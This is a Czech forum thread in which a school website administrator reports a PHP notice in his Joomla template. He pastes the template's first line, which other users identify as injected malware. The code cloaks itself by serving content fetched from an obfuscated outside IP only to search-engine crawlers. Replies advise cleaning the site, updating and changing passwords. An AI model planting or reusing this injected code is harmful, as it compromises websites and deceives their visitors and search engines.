Notice: Use of undefined constant HTTP_USER_AGENT

Jarda
24. úno 2020 11:06 #141805
Dobrý den, spravuji školní stránky v Joomle a najednou se objevila tato hláška, která se zobrazuje na všech stránkách webu: Notice: Use of undefined constant HTTP_USER_AGENT - assumed 'HTTP_USER_AGENT' in /volume1/web/joomla/templates/zstgm/index.php on line 1 . V 1. řádce toho souboru je tohle:
<?php $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if ((strpos($botbotbot,"google")) OR (strpos($botbotbot,"bing")) OR (strpos($botbotbot,"yahoo"))){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.31.253.227/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"); $result = curl_exec($ch); curl_close ($ch); echo $result;}?><?php
defined('_JEXEC') or die;
Je potřeba něco změnit, nebo provést nějakou aktualizaci? Adresa webu je zstgm-podborany.cz Děkuji předem za nějakou radu.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Bong
24. úno 2020 14:10 - 24. úno 2020 14:16 #141807
Stránky jsou nedostupné. Při pokusu kontaktovat server zstgm-podborany.cz vypršel časový limit.

Neco jste upravoval - instaloval? Nebo vám je odstavili? Nemáte je hacknuté?

I'm sorry, my responses are limited...you must ask the right questions.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Rudolf
24. úno 2020 15:33 #141808
Ano,

obraťte se na programátora, který ten programový nesmysl přidal na začátek do souboru /volume1/web/joomla/templates/zstgm/index.php aniž nadefinoval konstantu HTTP_USER_AGENT aby to po sobě opravil.

Vypnout hlášení chyb v joomla také můžete, ale tím chyba nezmizí, jen se přestane zobrazovat a při každém zobrazení se zapíše do logu na serveru - to je také chyba.

MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Jarda
24. úno 2020 16:16 #141809
Tak problém vyřešen. Odstranil jsem ten nesmysl z první řádky a už se to nezobrazuje. Netuším, kde se to tam vzalo, několik let to fungovalo v pořádku. Verze Joomly ale bylo 3.4.neco a ted jsem tam dal 3.6.5, nabízí to ještě verzi 3.9.15 ale mám obavy zda bude vše fungovat tak jak má.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Rudolf
24. úno 2020 16:25 - 24. úno 2020 16:25 #141810
To je možná klasická ukázka hacknutí webu :)

Jakmile jdete na web Vy, nevidíte žádnou chybu, jakmile jde nějaký bot (google, bing...) něco se stane a přidá sem:
http://$xxx.31.253.227/cakes/?.....

MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Bong
25. úno 2020 10:41 - 25. úno 2020 10:42 #141811

Jarda napsal: Tak problém vyřešen.


Problém vůbec není vyřešen. Stránky máte hacknuté a dá se na nich stále detekovat malware (viz příloha).

Musíte web vyčistit, aktualizovat na poslední verze (Joomlu i všechna rozšíření), změnit všechna přístupová hesla (Joomla, FTP, databáze i hosting) a provést alespoň základní zabezpečení.

To by nemělo být až zase tak náročné, stránky nemáte složité. Ale hlavně se zbavte té "nejoomlovské" fotogalerie, kterou tam provozujete. To je pravděpodobně ta největší bezpečnostní díra.


Postupujte bod po bodu podle článku Jak zachránit hacknutou Joomlu .

I'm sorry, my responses are limited...you must ask the right questions.
Přílohy:

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.